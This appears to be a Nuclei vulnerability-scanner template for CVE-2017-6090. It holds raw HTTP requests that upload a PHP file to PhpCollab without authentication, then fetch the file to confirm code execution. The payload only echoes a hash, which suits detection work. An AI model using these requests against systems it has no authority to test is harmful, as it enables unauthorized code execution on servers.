nuclei-templates/cves/2017/CVE-2017-6090.yaml

39 lines
1.1 KiB
YAML

id: CVE-2017-6090
info:
name: PhpCollab (unauthenticated) Arbitrary File Upload
author: pikpikcu
severity: critical
tags: cve,cve2017,phpcollab,rce,fileupload
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
requests:
- raw:
- | # REQUEST 1
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php echo md5('phpcollab_rce');?>
-----------------------------154934846911423734231554128137--
- | # REQUEST 2
GET /logos_clients/1.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "48dbd2384cb6b996fa1e2855c7f0567f"
- type: status
status:
- 200